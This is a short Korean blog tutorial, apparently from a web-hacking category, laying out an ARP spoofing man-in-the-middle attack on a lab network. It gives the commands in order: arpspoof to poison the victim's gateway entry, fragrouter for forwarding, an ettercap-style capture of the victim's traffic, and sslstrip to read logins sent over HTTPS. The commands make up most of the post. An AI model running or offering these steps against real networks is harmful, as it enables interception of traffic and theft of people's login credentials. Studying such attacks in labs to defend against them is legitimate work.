공격자 : 192.168.100.5
희생자: 192.168.100.200
게이트웨이 : 192.168.100.1
1. 공격자는 희생자에게 지속적으로 ARP패킷을 보내, GW의 하드웨어 주소를 공격자의 하드웨어 주소로 업데이트 한다.
# arpspoof -i eth0 -t 192.168.100.200 192.168.100.1
2. 희생자의 ARP 테이블 정보를 확인한다.
# arp -a
3. 공격자 시스템은 라우터로 설정하여 패킷이 실제 라우터로 전달될 수 있도록 IP 포워딩을 설정한다.
# fragrouter -B1
4. 희생자가 외부로 통신하는 내용을 중간에 가로채기 해서 본다.
# ethercap -T eth0
로그인할 때 평문전송 하는 사이트는 바로 확인가능하다. ssl통신하는곳은 sslstrip을 사용한다.
# sslstrip -a -k -f
클라우드 환경에서 ARP 스푸핑 방지 메커니즘 구현하기
'보안 > 웹 해킹_보안' 카테고리의 다른 글
브라우저 보안 설정을 통해 사용자 환경 보안 강화 (0) | 2015.06.05 |
---|---|
Kali Linux Tools Reference (0) | 2015.03.08 |
[BackTrack5 R3] skipfish를 이용한 웹 취약점 스캐닝 (0) | 2014.10.12 |
[해킹툴활용] John the ripper 를 이용한 패스워드 크랙 (0) | 2014.07.22 |
웹쉘점검도구 활용 (0) | 2014.07.14 |